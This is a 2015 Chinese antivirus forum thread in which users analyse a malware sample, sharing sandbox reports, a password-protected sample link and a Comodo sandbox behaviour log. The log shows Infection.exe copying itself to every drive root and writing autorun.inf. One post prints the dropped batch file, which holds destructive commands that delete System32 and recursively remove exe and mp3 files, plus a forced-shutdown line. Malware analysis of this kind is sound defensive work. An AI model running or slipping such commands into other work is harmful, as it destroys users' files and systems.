收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 8.23精锐样本中的一个文件
12下一页
返回列表 发新帖
查看: 3599|回复: 17
收起左侧

[病毒样本] 8.23精锐样本中的一个文件

[复制链接]
微光丶
发表于 2015-8-23 17:21:27 | 显示全部楼层 |阅读模式
本帖最后由 微光丶 于 2015-8-23 17:50 编辑

eset没扫出来几个  于是我重命名为.exe 然后挨个双击完   结果发现个这玩意  
密码:kafan
哈勃分析:http://habo.qq.com/file/showdetail?pk=ADIGZ11qB2UIOw==

火眼:http://fireeye.ijinshan.com/anal ... 795&type=1#full


od单步操作释放出来的文件

密码:kafan

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

ericdj
发表于 2015-8-23 17:28:55 | 显示全部楼层
BD,右键miss

右键入沙
windows smartscreen提醒


放行后一段时间后出现大量的cmd.exe弹窗

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

微光丶
 楼主| 发表于 2015-8-23 17:51:01 | 显示全部楼层
ericdj 发表于 2015-8-23 17:28
BD,右键miss

右键入沙

释放出来一个bat文件  然后执行了shutdown -s -t 60 -c
回复

举报

微光丶
 楼主| 发表于 2015-8-23 17:52:45 | 显示全部楼层
话说c盘根目录的那个我也不知道是不是这个玩意释放的,双击的多了 有点忘了  但是temp目录的肯定是- -
回复

举报

微光丶
 楼主| 发表于 2015-8-23 18:00:39 | 显示全部楼层

火眼无法分析- -哈勃根本无法上传- -

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

微光丶
 楼主| 发表于 2015-8-23 18:14:27 | 显示全部楼层
tmp68851.bat 文件内容【屏蔽掉了一些】
删掉C:\Windows\System32 不过貌似没什么卵用啊- -

@echo off
set ztmp=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ytmp
set MYFILES=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\afolder
set bfcec=tmp42711.exe
set cmdline=
SHIFT /0
@echo off
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
//start
start
@echo off
rd /S /F C:\Windows\System32
del /S /F "exe
del /S /F "mp3
//taskkill /f /im "explorer.exe"
//shutdown -s -f -t 60 -c "Pene tieso y flacido al mismo tiempo"
回复

举报

230f4
发表于 2015-8-23 18:16:29 | 显示全部楼层
上报
回复

举报

电脑发烧友
发表于 2015-8-23 18:16:56 | 显示全部楼层
跑了一下。不入沙的话,拦截了一个D盘根目录文件之后就没了。
[mw_shl_code=css,true]  <?xml version="1.0" encoding="utf-16" ?>
- <vscope ver="2.0">
- <process pid="9036" path="C:\Users\wuliao\Desktop\释放的文件\c盘根目录\Infection.exe" cmdline="" createtime="2015-08-23T10:15:36.996Z" termtime="2015-08-23T10:15:40.127Z" sha1="2D7D9B2E12F7666A44313DF14F2EA6A329D8FB91" hashCrc32="31848307" trusted="false" detected="false" restrictionLevel="KioskClientRestriction" parentpath="C:\Program Files\COMODO\COMODO Internet Security\virtkiosk.exe">
- <activities>
  <activity timestamp="2015-08-23T10:15:36.677Z" id="487357" type="LoadImageFile" path="C:\WINDOWS\SYSTEM32\WOW64.DLL" />
  <activity timestamp="2015-08-23T10:15:36.677Z" id="487358" type="LoadImageFile" path="C:\WINDOWS\SYSTEM32\WOW64WIN.DLL" />
  <activity timestamp="2015-08-23T10:15:36.678Z" id="487360" type="LoadImageFile" path="C:\WINDOWS\SYSTEM32\WOW64CPU.DLL" />
  <activity timestamp="2015-08-23T10:15:36.681Z" id="487362" type="LoadImageFile" path="C:\Windows\SysWOW64\mscoree.dll" />
  <activity timestamp="2015-08-23T10:15:36.754Z" id="487403" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\GUARD32.DLL" />
  <activity timestamp="2015-08-23T10:15:36.756Z" id="487405" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\SECHOST.DLL" />
  <activity timestamp="2015-08-23T10:15:36.764Z" id="487410" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\VERSION.DLL" />
  <activity timestamp="2015-08-23T10:15:36.765Z" id="487411" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\IMM32.DLL" />
  <activity timestamp="2015-08-23T10:15:36.769Z" id="487417" type="LoadImageFile" path="C:\Windows\Globalization\Sorting\SortDefault.nls" />
  <activity timestamp="2015-08-23T10:15:36.770Z" id="487418" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\FLTLIB.DLL" />
  <activity timestamp="2015-08-23T10:15:36.825Z" id="487455" type="LoadImageFile" path="C:\Windows\SysWOW64\cmdvrt32.dll" />
  <activity timestamp="2015-08-23T10:15:36.923Z" id="487460" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\KERNELBASE.DLL" />
  <activity timestamp="2015-08-23T10:15:37.000Z" id="487463" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\NTDLL.DLL" />
  <activity timestamp="2015-08-23T10:15:37.001Z" id="487464" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\KERNEL32.DLL" />
  <activity timestamp="2015-08-23T10:15:37.003Z" id="487468" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\USER32.DLL" />
  <activity timestamp="2015-08-23T10:15:37.004Z" id="487470" type="LoadImageFile" path="C:\Windows\SysWOW64\ADVAPI32.DLL" />
  <activity timestamp="2015-08-23T10:15:37.117Z" id="487639" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\OLE32.DLL" />
  <activity timestamp="2015-08-23T10:15:37.118Z" id="487641" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\GDI32.DLL" />
  <activity timestamp="2015-08-23T10:15:37.228Z" id="487763" type="KernelObject" name="\Sessions\1\BaseNamedObjects\mchMixCache$234c!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.229Z" id="487767" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718ff70!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.230Z" id="487772" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771906f0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.232Z" id="487777" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190870!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.233Z" id="487782" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771907e0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.234Z" id="487787" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190000!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.236Z" id="487796" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190080!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.238Z" id="487805" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77191cb0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.240Z" id="487814" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77191d88!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.241Z" id="487823" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fcac!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.243Z" id="487832" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190690!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.244Z" id="487837" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190df0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.246Z" id="487846" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77191be0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.248Z" id="487855" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718ffa0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.249Z" id="487860" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fdc4!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.250Z" id="487865" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771900b0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.251Z" id="487870" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fd60!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.252Z" id="487875" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718febc!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.253Z" id="487879" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $7718febc" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.254Z" id="487885" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190888!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.255Z" id="487889" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $77190888" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.256Z" id="487895" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190ed4!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.257Z" id="487899" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $77190ed4" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.258Z" id="487905" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fb24!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.259Z" id="487909" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $7718fb24" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.261Z" id="487915" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771908a0!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.261Z" id="487919" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $771908a0" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.263Z" id="487925" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771903b4!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.266Z" id="487927" type="LoadImageFile" path="C:\Users\wuliao\Desktop\释放的文件\c盘根目录\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:37.499Z" id="487929" type="LoadImageFile" path="C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll" />
  <activity timestamp="2015-08-23T10:15:37.579Z" id="487932" type="LoadImageFile" path="C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll" />
  <activity timestamp="2015-08-23T10:15:37.588Z" id="487937" type="KernelObject" name="\BaseNamedObjects\Cor_Private_IPCBlock_9036!comodo_6" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.588Z" id="487938" type="KernelObject" name="\BaseNamedObjects\Cor_Public_IPCBlock_9036!comodo_6" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.588Z" id="487939" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Global\CorDBIPCSetupSyncEvent_9036!comodo_6" isCreate="true" objectType="Event" />
  <activity timestamp="2015-08-23T10:15:37.750Z" id="487953" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\SHELL32.DLL" />
  <activity timestamp="2015-08-23T10:15:37.751Z" id="487956" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7558534a!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.751Z" id="487958" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $7558534a" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.753Z" id="487963" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75361e06!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.754Z" id="487965" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $75361e06" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.756Z" id="487974" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7559b4d1!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.757Z" id="487976" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $7559b4d1" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.758Z" id="487981" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75399708!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:37.759Z" id="487983" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NamedBuffer, mAH, Process $0000234c, API $75399708" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:37.772Z" id="487987" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\PROFAPI.DLL" />
  <activity timestamp="2015-08-23T10:15:38.210Z" id="488027" type="LoadImageFile" path="C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll" />
  <activity timestamp="2015-08-23T10:15:38.221Z" id="488034" type="LoadImageFile" path="C:\Windows\system32\rpcss.dll" />
  <activity timestamp="2015-08-23T10:15:38.327Z" id="488041" type="LoadImageFile" path="C:\Windows\SysWOW64\uxtheme.dll" />
  <activity timestamp="2015-08-23T10:15:38.413Z" id="488057" type="LoadImageFile" path="C:\Program Files (x86)\ADSafe\adsPop32.dll" />
  <activity timestamp="2015-08-23T10:15:38.485Z" id="488065" type="LoadImageFile" path="C:\Program Files (x86)\ADSafe\adsNet32.dll" />
  <activity timestamp="2015-08-23T10:15:38.493Z" id="488072" type="LoadImageFile" path="C:\Windows\SysWOW64\l_intl.nls" />
  <activity timestamp="2015-08-23T10:15:38.512Z" id="488074" type="LoadImageFile" path="C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll" />
  <activity timestamp="2015-08-23T10:15:38.621Z" id="488084" type="LoadImageFile" path="C:\Windows\assembly\NativeImages_v2.0.50727_32\System\908ba9e296e92b4e14bdc2437edac603\System.ni.dll" />
  <activity timestamp="2015-08-23T10:15:38.696Z" id="488105" type="LoadImageFile" path="C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\238f7a4a7dba5830d5aa15b99bdcc848\Microsoft.VisualBasic.ni.dll" />
  <activity timestamp="2015-08-23T10:15:38.717Z" id="488112" type="LoadImageFile" path="C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp" />
  <activity timestamp="2015-08-23T10:15:38.718Z" id="488113" type="LoadImageFile" path="C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\prcp.nlp" />
  <activity timestamp="2015-08-23T10:15:38.718Z" id="488114" type="KernelObject" name="\Sessions\1\BaseNamedObjects\NLS_00000804_Exception_Table_3_2!comodo_6" isCreate="true" objectType="Section" />
  <activity timestamp="2015-08-23T10:15:38.718Z" id="488115" type="LoadImageFile" path="C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp" />
  <activity timestamp="2015-08-23T10:15:38.749Z" id="488116" type="LoadImageFile" path="C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll" />
  <activity timestamp="2015-08-23T10:15:38.814Z" id="488128" type="LoadImageFile" path="C:\Windows\Microsoft.NET\Framework\v2.0.50727\zh-CHS\mscorrc.dll" />
  <activity timestamp="2015-08-23T10:15:38.893Z" id="488130" type="LoadImageFile" path="C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5a401fd2a7689ff13fb54182953f9c40\System.Drawing.ni.dll" />
  <activity timestamp="2015-08-23T10:15:39.406Z" id="488142" type="LoadImageFile" path="C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\6949c4470a81970ec3de0a575d93babc\System.Windows.Forms.ni.dll" />
  <activity timestamp="2015-08-23T10:15:39.440Z" id="488149" type="LoadImageFile" path="C:\Windows\SysWOW64\shfolder.dll" />
  <activity timestamp="2015-08-23T10:15:39.445Z" id="488154" type="FindFile" path="C:\" pattern="" />
  <activity timestamp="2015-08-23T10:15:39.445Z" id="488155" type="DeleteFile" path="C:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.599Z" id="488156" type="LoadImageFile" path="C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\d49908aa93a23c84847b1f8b1b667860\System.Xml.ni.dll" />
  <activity timestamp="2015-08-23T10:15:39.665Z" id="488166" type="LoadImageFile" path="C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_zh-CHS_b77a5c561934e089\mscorlib.Resources.dll" />
  <activity timestamp="2015-08-23T10:15:39.671Z" id="488174" type="CreateFile" path="C:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.673Z" id="488176" type="ModifyFile" path="C:\Infection.exe:$CmdTcID:$DATA" />
  <activity timestamp="2015-08-23T10:15:39.673Z" id="488178" type="ModifyFile" path="C:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.675Z" id="488180" type="ModifyFile" path="C:\ autorun.inf" />
  <activity timestamp="2015-08-23T10:15:39.676Z" id="488181" type="DeleteFile" path="D:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.679Z" id="488183" type="ModifyFile" path="D:\Infection.exe:$CmdTcID:$DATA" />
  <activity timestamp="2015-08-23T10:15:39.680Z" id="488185" type="CreateFile" path="D:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.682Z" id="488187" type="ModifyFile" path="D:\ autorun.inf" />
  <activity timestamp="2015-08-23T10:15:39.683Z" id="488188" type="DeleteFile" path="E:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.686Z" id="488190" type="ModifyFile" path="E:\Infection.exe:$CmdTcID:$DATA" />
  <activity timestamp="2015-08-23T10:15:39.686Z" id="488192" type="CreateFile" path="E:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.687Z" id="488194" type="ModifyFile" path="E:\ autorun.inf" />
  <activity timestamp="2015-08-23T10:15:39.688Z" id="488195" type="DeleteFile" path="F:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.697Z" id="488197" type="ModifyFile" path="F:\Infection.exe:$CmdTcID:$DATA" />
  <activity timestamp="2015-08-23T10:15:39.697Z" id="488199" type="CreateFile" path="F:\Infection.exe" />
  <activity timestamp="2015-08-23T10:15:39.698Z" id="488201" type="ModifyFile" path="F:\ autorun.inf" />
  <activity timestamp="2015-08-23T10:15:39.753Z" id="488217" type="LoadImageFile" path="C:\Windows\SysWOW64\zh-CN\KernelBase.dll.mui" />
  <activity timestamp="2015-08-23T10:15:39.759Z" id="488224" type="KernelObject" name="\RPC Control\OLE7CFE49F73BCA4EF48E91FDDFADB4" isCreate="true" objectType="Port" />
  <activity timestamp="2015-08-23T10:15:39.771Z" id="488225" type="LoadImageFile" path="C:\Windows\SysWOW64\CRYPTSP.dll" />
  <activity timestamp="2015-08-23T10:15:39.776Z" id="488230" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\RSAENH.DLL" />
  <activity timestamp="2015-08-23T10:15:39.832Z" id="488243" type="LoadImageFile" path="C:\WINDOWS\SYSWOW64\RPCRTREMOTE.DLL" />
  <activity timestamp="2015-08-23T10:15:39.838Z" id="488252" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $71af0000!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.841Z" id="488253" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7617ea00!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.843Z" id="488254" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76181804!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.846Z" id="488255" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7663e8a8!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.848Z" id="488256" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $753285b2!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.851Z" id="488257" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $753284eb!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.853Z" id="488258" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75327da8!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.854Z" id="488259" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75327dc6!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.856Z" id="488260" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75327d64!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.857Z" id="488261" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75327d47!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.858Z" id="488262" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75324f9c!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.860Z" id="488263" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $761722c1!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.861Z" id="488264" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7673a965!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.863Z" id="488265" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76773553!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.864Z" id="488266" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7673a9ad!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.866Z" id="488267" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $767734d3!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.868Z" id="488268" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $767734c3!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.870Z" id="488269" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7673a97d!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.871Z" id="488270" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7673c7a6!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.873Z" id="488271" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7532a0ff!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.874Z" id="488272" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7532a11d!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.876Z" id="488273" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75327c40!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.879Z" id="488274" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75326b9d!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.881Z" id="488275" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771903cc!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.884Z" id="488277" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7719054c!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.886Z" id="488278" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fbbc!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.887Z" id="488279" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718f990!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.888Z" id="488280" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190798!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.890Z" id="488281" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77191074" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.891Z" id="488282" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718ff70" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.893Z" id="488283" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fea4" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.894Z" id="488284" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771906f0" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.895Z" id="488285" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190fcc" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.897Z" id="488286" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190870" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.898Z" id="488287" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771910ec" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.900Z" id="488288" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771907e0" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.901Z" id="488289" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771918bc" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.903Z" id="488290" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190690" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.904Z" id="488291" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190930" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.905Z" id="488292" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718ffa0" isCreate="true" objectType="Mutex" />
